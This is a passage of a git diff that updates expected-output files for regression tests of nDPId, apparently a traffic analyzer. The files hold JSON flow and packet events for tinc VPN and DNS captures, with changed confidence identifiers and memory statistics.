JE08oruybimAl5F4KHctwad6wrnqDh7AMDE3spgEO04z6pL2VZXL\/wvq6pxHL80kORMsGZgPOmyHtPCRE5Jd+RFgmwBejwRrNJFCuLc2P622GjZ1t\/hPuud14khvjnfHdyfKsl19iLyzwv7qu0oEoiwBrYf06g7MzcULZl4XUxJNSE9RYU15rJmRxguh4eXuIOqgIqrfkbI\/\/vDyBWYyc45utTloDIm+GnDiAeigtPF4FijLPE9qVDfQilPuHMnf6UDvllbgNqo19g3gnmLroqXep+7LyRYp4sWr4\/d\/TZKaCucaaCwVm1u\/1te\/n+aOftes5xygxK+OaKehbJ47nnj4GJRcueg7KFHNq2ES0Uj1Rh2+lhguZLWYwLh4\/FPK0vdBcca9l29F4kxSaDHn6BeoZpX+wivGn5jMTbID2EPugYpELm+yXQDHU1W7JBJkdRRhJfBWIKo8UZofXK4qgL2\/MqCqF2T2\/hEjt9sAO7DVGx2T23++65+kzCDH2qiAfrQdQFlN08V17FGkydmcJibPSSbSe7aLjPjiXuGdc7ip\/LMmiTS0sCJq6zHCBk5aHilHCEqmTl+eL9Q9vwrMeAdX+cTIhD7xTxK6aeGzriTEJFQi6+ZDkO2+SfJZlZhRSLhc55JEaOH4LdN2VABhAfw=="} 01675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1495983428043,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":958,"pkt_l4_len":924,"thread_ts_msec":1495983428043,"pkt":"ACbGCvpSABcILL3nCABFCAOwAABAADERhuO5U9pwg3KoG9lo2WgDnO+CxkvMU5czu375VqRfqLEu7HGryDGh\/bfeaQJnEYyovrmntDxt74C8PKQJMHvY4MA1ZHuHhnLJLLc7h764zEbGLw\/vzqsaP4XOJmX3J5ZoXTmAMsXnjvJUPqVeWdg0PXJhqa6st9hNynxv5D0rpJqm0\/zV192qcE59jCUVvmB8PfyMGzNb8iu7j79YvIHCzFHzmycvx5sIdKuzv+9aaD2+9O1fWAuPwq8\/8DIg8DeQB7htbL3\/j6lwDGupSOVHCsI1+lYyNr8A5\/OFujJsJCBzKGXQVn+oJRoQMsFgr0giRTOfhVQb+GlZOLXTcVvxl6mNiWSoDQXoxAfPuixrlp8F\/MUrFtVqJYJIqlWUSZ0FHJzKiXJ5yQvwNmnsvYHqMQNW6ZCn++1tGEto8r5tq\/BDe0FvMAOQC\/Iq49d9xjtHRJaZkPSuUT0Ue8\/0Y0g7e7MLBCNRDp3pFvP\/SDROeSBv+1Hrsd3VgZ3eZsdET6SE7O+jiB1npy8XRuCERu\/h5FlX8FbvbKHJP4IXbapoGYosv9tEU2XONo65wz3MCF\/bVbrUPcOASb6j+c55C5rFZMKjA9llC2lki+5ox8NX3C0rsVb9ezbzAq4pvwBxx6yeMVlmBhRxjwXLWviN6bjb8+kKUMxdeqvtFZ90hWLG3av8x5N1D1shhjp\/Pkh3vfzESwJoedvps7xxuR16c9ku4Rlje1SzPbiXWLLd2ctB3NoWHVeTFrvLRU2yqM5LNXQpjLOWYVqndimokWzm3PvfsX2+ickLKvqhiNB8NMbCQKKllVtQtaf37M0W3hxij8fNqkfQ3Dwvv36xYQY6aA2cxZJ7cAJfgWt3+2IqzsbQ\/hOa1lDnl8uliASJ4hjXOWhi4prZ86H1uoSeDR53SAlBdMQQ3YoaLSv6kQQOXAUwHuZQi7+x\/RE5HfoAvVeNzG90OcOnL2uiCxjhyp3\/swc9NGfoqhpvTPlS\/HF6E4gzQu+uwm3Kmj7AsKixik3ciIBb6VqLoyiaQR35wKSQydm3qyc2A8RxVwJEHM9ChZNid+PGF9MC3cdjsTP6IG4AOw3VS8jLQznT38vyJvgWelWwQ+I9gJ2zh8MbfaLP+EWNQPI478wMYlCsuyg5uNNDg0lSF1epToqo6+lky+h2nAa21hKOviRtVRN8LV88QPWbYJx4n3gM4sg9yVPde6y+bdl\/hYGe1J5JIAW7OGyTqN+C43dvapKXMw=="} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1495983427744,"flow_last_seen":1495983475109,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":5390,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":49290,"dst_port":55656,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} -00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":130,"flow_first_seen":1495983428000,"flow_last_seen":1495983470973,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":1468,"flow_tot_l4_payload_len":164056,"flow_avg_l4_payload_len":1261,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":55655,"dst_port":55655,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} -00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":134,"flow_first_seen":1495983428043,"flow_last_seen":1495983463866,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":1468,"flow_tot_l4_payload_len":164136,"flow_avg_l4_payload_len":1224,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"185.83.218.112","dst_ip":"131.114.168.27","src_port":55656,"dst_port":55656,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1495983427717,"flow_last_seen":1495983475073,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":4647,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":59244,"dst_port":55655,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1495983427744,"flow_last_seen":1495983475109,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":5390,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":49290,"dst_port":55656,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} +00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":130,"flow_first_seen":1495983428000,"flow_last_seen":1495983470973,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":1468,"flow_tot_l4_payload_len":164056,"flow_avg_l4_payload_len":1261,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":55655,"dst_port":55655,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} +00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":134,"flow_first_seen":1495983428043,"flow_last_seen":1495983463866,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":1468,"flow_tot_l4_payload_len":164136,"flow_avg_l4_payload_len":1224,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"185.83.218.112","dst_ip":"131.114.168.27","src_port":55656,"dst_port":55656,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1495983427717,"flow_last_seen":1495983475073,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":4647,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":59244,"dst_port":55655,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","packets-captured":317,"packets-processed":317,"total-skipped-flows":0,"total-l4-payload-len":338229,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":27,"global_ts_msec":1495983475109} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 317/317 @@ -33,9 +33,9 @@ ~~ total active/idle flows...: 4/4 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5890329 bytes -~~ total memory freed........: 5890329 bytes -~~ total allocations/frees...: 118455/118455 +~~ total memory allocated....: 6019774 bytes +~~ total memory freed........: 6019774 bytes +~~ total allocations/frees...: 121215/121215 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 451 chars ~~ json string max len.......: 2397 chars diff --git a/test/results/tk.pcap.out b/test/results/tk.pcap.out index 07b729ede..fdddce8ae 100644 --- a/test/results/tk.pcap.out +++ b/test/results/tk.pcap.out @@ -2,22 +2,22 @@ 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tk.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1613939315029} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315029,"flow_last_seen":1613939315029,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1613939315029,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":51954,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1613939315029,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1613939315029,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA6W4cAAEARmyjAqAGywKgBAcryADUAJu9GCIYBAAABAAAAAAAABXdob2lzA2RvdAJ0awAAAQAB"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315029,"flow_last_seen":1613939315029,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1613939315029,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":51954,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315029,"flow_last_seen":1613939315029,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1613939315029,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":51954,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1613939315127,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1613939315127,"pkt":"KDc3AG3IEBMx8Tl2CABFAABKKoNAADkRkxzAqAEBwKgBsgA1yvIANgAACIaBgAABAAEAAAAABXdob2lzA2RvdAJ0awAAAQABwAwAAQABAAABLAAEaJs3ng=="} -00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613939315029,"flow_last_seen":1613939315127,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1613939315127,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":51954,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.155.55.158"}} +00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613939315029,"flow_last_seen":1613939315127,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1613939315127,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":51954,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.155.55.158"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315127,"flow_last_seen":1613939315127,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1613939315127,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":55591,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1613939315127,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1613939315127,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA6pQMAAEARUazAqAGywKgBAdknADUAJrATOWkBAAABAAAAAAAABXdob2lzA2RvdAJ0awAAHAAB"} -00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315127,"flow_last_seen":1613939315127,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1613939315127,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":55591,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315127,"flow_last_seen":1613939315127,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1613939315127,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":55591,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1613939315183,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1613939315183,"pkt":"KDc3AG3IEBMx8Tl2CABFAAB1z01AADkR7ibAqAEBwKgBsgA12ScAYQAAOWmBgAABAAAAAQAABXdob2lzA2RvdAJ0awAAHAABwBIABgABAAAOEAAvA25zMQNkbnPAFgNzb2EHZnJlZW5vbQNjb20AYBhZHgAAA4QAABwgAAk6gAAAHCA="} -00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613939315127,"flow_last_seen":1613939315183,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1613939315183,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":55591,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613939315127,"flow_last_seen":1613939315183,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1613939315183,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":55591,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315184,"flow_last_seen":1613939315184,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1613939315184,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":53820,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1613939315184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1613939315184,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA6otUAAEARU9rAqAGywKgBAdI8ADUAJlfumIYBAAABAAAAAAAABXdob2lzA2RvdAJ0awAADwAB"} -00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315184,"flow_last_seen":1613939315184,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1613939315184,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":53820,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315184,"flow_last_seen":1613939315184,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1613939315184,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":53820,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1613939315239,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1613939315239,"pkt":"KDc3AG3IEBMx8Tl2CABFAAB1ZXdAADkRV\/3AqAEBwKgBsgA10jwAYQAAmIaBgAABAAAAAQAABXdob2lzA2RvdAJ0awAADwABwBIABgABAAAOEAAvA25zMQNkbnPAFgNzb2EHZnJlZW5vbQNjb20AYBhZHgAAA4QAABwgAAk6gAAAHCA="} -00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613939315184,"flow_last_seen":1613939315239,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1613939315239,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":53820,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613939315127,"flow_last_seen":1613939315183,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1613939315239,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":55591,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613939315184,"flow_last_seen":1613939315239,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1613939315239,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":53820,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613939315029,"flow_last_seen":1613939315127,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1613939315239,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":51954,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 